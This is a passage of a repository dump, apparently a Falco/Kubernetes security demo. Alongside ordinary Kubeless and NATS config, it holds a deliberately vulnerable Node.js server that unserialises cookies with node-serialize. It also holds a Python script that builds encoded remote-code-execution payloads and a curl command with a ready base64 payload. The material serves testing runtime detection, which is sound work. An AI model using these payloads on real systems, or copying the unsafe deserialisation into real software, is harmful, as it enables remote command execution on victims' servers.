name: falco-pod-delete-cluster-role 27 | apiGroup: rbac.authorization.k8s.io 28 | -------------------------------------------------------------------------------- /kubeless-function/kubeless-cm.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ConfigMap 3 | metadata: 4 | name: kubeless-config 5 | namespace: kubeless 6 | data: 7 | builder-image: kubeless/function-image-builder@sha256:fe484ad1cbcee69b707a0cb33e53551f39989219f56d4037c811705efa35a06d 8 | deployment: |- 9 | spec: 10 | template: 11 | serviceAccountName: falco-pod-delete 12 | enable-build-step: "false" 13 | function-registry-tls-verify: "true" 14 | ingress-enabled: "false" 15 | runtime-images: |- 16 | [ 17 | { 18 | "ID": "python", 19 | "compiled": false, 20 | "versions": [ 21 | { 22 | "name": "python27", 23 | "version": "2.7", 24 | "runtimeImage": "kubeless/python@sha256:07cfb0f3d8b6db045dc317d35d15634d7be5e436944c276bf37b1c630b03add8", 25 | "initImage": "python:2.7" 26 | }, 27 | { 28 | "name": "python34", 29 | "version": "3.4", 30 | "runtimeImage": "kubeless/python@sha256:f19640c547a3f91dbbfb18c15b5e624029b4065c1baf2892144e07c36f0a7c8f", 31 | "initImage": "python:3.4" 32 | }, 33 | { 34 | "name": "python36", 35 | "version": "3.6", 36 | "runtimeImage": "kubeless/python@sha256:0c9f8f727d42625a4e25230cfe612df7488b65f283e7972f84108d87e7443d72", 37 | "initImage": "python:3.6" 38 | } 39 | ], 40 | "depName": "requirements.txt", 41 | "fileNameSuffix": ".py" 42 | }, 43 | { 44 | "ID": "nodejs", 45 | "compiled": false, 46 | "versions": [ 47 | { 48 | "name": "node6", 49 | "version": "6", 50 | "runtimeImage": "kubeless/nodejs@sha256:61c5a10aacb709c4575a09a4aa28f822b2d008c0dbf4aa0b124705ee9ca143f9", 51 | "initImage": "node:6.10" 52 | }, 53 | { 54 | "name": "node8", 55 | "version": "8", 56 | "runtimeImage": "kubeless/nodejs@sha256:fc1aa96e55116400ee13d664a655dfb2025ded91858ebfd5fc0c8f0d6b923eba", 57 | "initImage": "node:8" 58 | } 59 | ], 60 | "depName": "package.json", 61 | "fileNameSuffix": ".js" 62 | }, 63 | { 64 | "ID": "ruby", 65 | "compiled": false, 66 | "versions": [ 67 | { 68 | "name": "ruby24", 69 | "version": "2.4", 70 | "runtimeImage": "kubeless/ruby@sha256:0dce29c0eb2a246f7d825b6644eeae7957b26f2bfad2b7987f2134cc7b350f2f", 71 | "initImage": "bitnami/ruby:2.4" 72 | } 73 | ], 74 | "depName": "Gemfile", 75 | "fileNameSuffix": ".rb" 76 | }, 77 | { 78 | "ID": "php", 79 | "compiled": false, 80 | "versions": [ 81 | { 82 | "name": "php72", 83 | "version": "7.2", 84 | "runtimeImage": "kubeless/php@sha256:82b94c691302bc82f3900444255cabb8f230487764eafeba7866ac49d90ddc3b", 85 | "initImage": "composer:1.6" 86 | } 87 | ], 88 | "depName": "composer.json", 89 | "fileNameSuffix": ".php" 90 | }, 91 | { 92 | "ID": "go", 93 | "compiled": true, 94 | "versions": [ 95 | { 96 | "name": "go1.10", 97 | "version": "1.10", 98 | "runtimeImage": "kubeless/go@sha256:bf72622344a54e4360f31d3fea5eb9dca2c96fbedc6f0ad7c54f3eb8fb7bd353", 99 | "initImage": "kubeless/go-init@sha256:ce6ef4fafe518ed78b3a68b03947c064fec1cf8c667cd109e9331f227877b3a9" 100 | } 101 | ], 102 | "depName": "Gopkg.toml", 103 | "fileNameSuffix": ".go" 104 | } 105 | ] 106 | service-type: ClusterIP -------------------------------------------------------------------------------- /kubeless-function/requirements.txt: -------------------------------------------------------------------------------- 1 | kubernetes==2.0.0 2 | -------------------------------------------------------------------------------- /nats-cluster-via-CRD.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: "nats.io/v1alpha2" 2 | kind: "NatsCluster" 3 | metadata: 4 | name: "nats" 5 | spec: 6 | size: 3 7 | version: "1.1.0" -------------------------------------------------------------------------------- /nodejs-app/README.md: -------------------------------------------------------------------------------- 1 | # Deploy a Vunerable nodejs Application 2 | 3 | This example allows you to deploy a vulnerable Node.js application that allows remote command execution. The application does not sanitize inputs, and thus can be vulnerable to attacks against a JavaScript feature called Immediately Invoked Function Expressions. 4 | 5 | ## Deploy the Application 6 | 7 | To deploy the vulnerable application run: 8 | ``` 9 | $ kubectl create -f nodejs-app.yml 10 | ``` 11 | 12 | ## node-exploit 13 | 14 | This contains the vulnerable application and the Dockerfile used to create the container containing the application. 15 | 16 | ## nodejspayload.py 17 | 18 | Use this to generate a payload that exploits the application. On a MacOS or Linux system run: 19 | 20 | ``` 21 | $ python nodejspayload.py "ls -l /" | base64 22 | eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTAxLDEyMCwxMDEsOTksNDAsMzksMTA4LDExNSwzMiw0NSwxMDgsMzIsNDcsMzksNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwMSwxMTQsMTE0LDExMSwxMTQsNDQsMzIsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDQsMzIsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDEsMzIsMTIzLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQxLDMyLDEyNSw0MSw1OSwxMCkpfSgpIn0= 23 | ``` 24 | 25 | Set a cookie with this data via curl and access the application. The output of the command that is ran will appear in the container's `stdout`. 26 | 27 | ``` 28 | curl --cookie "profile=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTAxLDEyMCwxMDEsOTksNDAsMzksMTA4LDExNSwzMiw0NSwxMDgsMzIsNDcsMzksNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwMSwxMTQsMTE0LDExMSwxMTQsNDQsMzIsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDQsMzIsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDEsMzIsMTIzLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQxLDMyLDEyNSw0MSw1OSwxMCkpfSgpIn0=" http://:30080/ 29 | Hello World 30 | ``` 31 | 32 | 33 | ``` 34 | -------------------------------------------------------------------------------- /nodejs-app/node-exploit/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:carbon 2 | 3 | WORKDIR /usr/src/app 4 | 5 | COPY package*.json ./ 6 | 7 | RUN npm install 8 | 9 | COPY . . 10 | 11 | EXPOSE 3000 12 | 13 | CMD [ "npm", "start" ] -------------------------------------------------------------------------------- /nodejs-app/node-exploit/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "node-exploit", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "server.js", 6 | "dependencies": { 7 | "express": "4.16.1", 8 | "cookie-parser": "1.4.3", 9 | "escape-html": "1.0.3", 10 | "node-serialize": "0.0.4" 11 | }, 12 | "scripts": { 13 | "test": "echo \"Error: no test specified\" && exit 1", 14 | "start": "node server.js" 15 | }, 16 | "author": "", 17 | "license": "ISC" 18 | } 19 | -------------------------------------------------------------------------------- /nodejs-app/node-exploit/server.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var cookieParser = require('cookie-parser'); 3 | var escape = require('escape-html'); 4 | var serialize = require('node-serialize'); 5 | var app = express(); 6 | app.use(cookieParser()) 7 | 8 | app.get('/', function(req, res) { 9 | if (req.cookies.profile) { 10 | var str = new Buffer(req.cookies.profile, 'base64').toString(); 11 | var obj = serialize.unserialize(str); 12 | if (obj.username) { 13 | res.send("Hello " + escape(obj.username)); 14 | } 15 | } else { 16 | res.cookie('profile', "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=", { 17 | maxAge: 900000, 18 | httpOnly: true 19 | }); 20 | } 21 | res.send("Hello World"); 22 | }); 23 | app.listen(3000); -------------------------------------------------------------------------------- /nodejs-app/nodejs-app.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: node-app 5 | namespace: node-app 6 | labels: 7 | app: node-app 8 | role: frontend 9 | spec: 10 | type: NodePort 11 | ports: 12 | - port: 3000 13 | nodePort: 30080 14 | selector: 15 | app: node-app 16 | role: frontend 17 | --- 18 | apiVersion: extensions/v1beta1 19 | kind: Deployment 20 | metadata: 21 | name: frontend 22 | namespace: node-app 23 | spec: 24 | replicas: 1 25 | strategy: 26 | rollingUpdate: 27 | maxUnavailable: 0 28 | maxSurge: 1 29 | template: 30 | metadata: 31 | labels: 32 | app: node-app 33 | role: frontend 34 | spec: 35 | containers: 36 | - name: frontend 37 | image: sysdiglabs/node-exploit:latest -------------------------------------------------------------------------------- /nodejs-app/nodejspayload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Generator for encoded NodeJS payloads for exploiting unserialization and IIFE 3 | # Based on the NodeJS reverse shell by OpSecX 4 | # https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py 5 | # Based on the NodeJS reverse shell by Evilpacket 6 | # https://github.com/evilpacket/node-shells/blob/master/node_revshell.js 7 | # Onelineified and suchlike by infodox (and felicity, who sat on the keyboard) 8 | # Insecurety Research (2013) - insecurety.net 9 | import sys 10 | 11 | if len(sys.argv) != 2: 12 | print "Usage: %s CMD" % (sys.argv[0]) 13 | sys.exit(0) 14 | 15 | CMD = sys.argv[1] 16 | 17 | 18 | def charencode(string): 19 | """String.CharCode""" 20 | encoded = '' 21 | for char in string: 22 | encoded = encoded + "," + str(ord(char)) 23 | return encoded[1:] 24 | 25 | NODEJS_REV_SHELL = ''' 26 | require('child_process').exec('%s', function(error, stdout, stderr) { console.log(stdout) }); 27 | ''' % (CMD) 28 | 29 | PAYLOAD = charencode(NODEJS_REV_SHELL) 30 | sys.stdout.write('{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}' % (PAYLOAD)) -------------------------------------------------------------------------------- /read.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # read.sh /path/to/pipe 3 | # 4 | # this script will read from a pipe and print anything read. 5 | 6 | pipe=$1 7 | 8 | while true 9 | do 10 | if read line <$pipe; then 11 | echo $line 12 | fi 13 | done 14 | --------------------------------------------------------------------------------